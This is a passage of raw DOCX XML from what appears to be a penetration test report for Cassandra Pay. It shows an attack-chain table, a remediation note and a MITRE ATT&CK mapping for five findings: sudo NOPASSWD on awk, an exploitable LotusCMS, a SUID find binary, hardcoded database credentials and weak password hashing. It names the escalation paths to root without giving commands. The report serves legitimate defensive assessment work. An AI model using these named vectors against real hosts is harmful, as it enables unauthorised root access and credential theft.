                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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CAFAC71" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>vendor-eval-01</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A772319" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>F4 (hardcoded DB credentials)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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78A4AD3" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>www-data shell → MySQL root session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="00A9DBFF"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0CE689C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>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98FDD7F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>vendor-eval-01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F312D27" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>F5 (weak password hashing)</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C9DE6BD" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>MySQL session → cleartext user passwords; potential SSH foothold on the host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="6C3C5ED5"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F69785E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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C3B6080" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>cassandra-stg-01</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6CF1F63C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>F1 (sudo NOPASSWD on awk)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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19805B54" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Foothold → uid=0 root on the production-class asset (~10 seconds)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="6C6142DA"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30F0FDB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>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3E035C6" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">   alt-path: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B7BD860" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>F3 (non-standard SUID find)</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928C6D9" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Same outcome, different vector, ~7 minutes (slower but parallel to F1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A4EA518" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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57A4" w14:paraId="09B3F045" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9026" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="2E7D32"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="2E7D32"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="2E7D32"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="2E7D32"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="280" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="280" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="66208C51" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Breaking the chain. The remediation for F2 (taking LotusCMS out of the vendor stack) short-circuits steps 1–3 of the chain. The remediation for F1 (removing the sudo NOPASSWD rule) short-circuits step 4. A defender does not need to fix everything to close this specific path; a single well-placed fix at either of the two breakpoints stops the worst case. This is the core argument for the priority ranking in §5.1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57154FAC" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679E53B2" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc229906604"/>
      <w:r>
        <w:t>4.3  MITRE ATT&amp;CK technique mapping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="3FFDC82E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The table below maps each finding to the MITRE ATT&amp;CK technique that an attacker would use to exploit it. The mapping is intended to integrate with Cassandra Pay's existing SOC playbooks, which are organised by ATT&amp;CK tactic. Detection signatures listed in §5 and §7 are coded against the same identifiers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F55180" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>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800"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="4000"/>
        <w:gridCol w:w="1226"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="2D96B09D" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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2F44453D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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6920EF4D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>ATT&amp;CK Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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2F895B61" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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43835C20" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Technique name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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217200D5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Sub-technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="7E97603C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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9024A95" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>F1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7F3FDE9" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Privilege Escalation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660ADEF" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>T1548.003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5FD7EF1" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Abuse Elevation Control Mechanism: Sudo and Sudo Caching</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8FBCA94" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="5D704C71" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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1053E126" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>F2</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CF13250" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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C241A27" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>T1190</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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200C2402" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Exploit Public-Facing Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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CCE3267" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="16C3F9A1" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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8317FA4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>F2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DFA8254" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Execution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E66C2DB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>T1059.004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774E2C70" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter: Unix Shell</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D0BBFA6" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="7BC177D8" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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74C6369" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>F3</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88EAFC0" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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24F9354A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>T1548.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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77E17E0" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Abuse Elevation Control Mechanism: Setuid and Setgid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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B66A480" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="01D58515" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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81FA642" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>F4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13A1782" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Credential Access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CA48E6D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>T1552.001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FF8A7EB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Unsecured Credentials: Credentials In Files</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14EA9D1" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="3900818A" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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75F150C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>F5</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15B763D4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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377D66CD" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>T1110.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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60DD9572" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Brute Force: Password Cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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2FBB217D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63766FC2" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AA6381" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc229906605"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5. Summary Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="10B839A3" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc229906606"/>
      <w:r>
        <w:t>5.1  Priority Recommendations Table</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="0687D9AA" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The recommendations below derive from the findings in §4 and are sorted by impact-to-effort ratio, not by raw CVSS. Recommendation #1 closes the worst case at the lowest implementation cost; the table follows downward. Effort is bucketed (Low / Medium / High) per the PTES report convention; owners reflect Cassandra Pay's organisational chart shared during pre-engagement interactions.</w:t>
      </w:r>
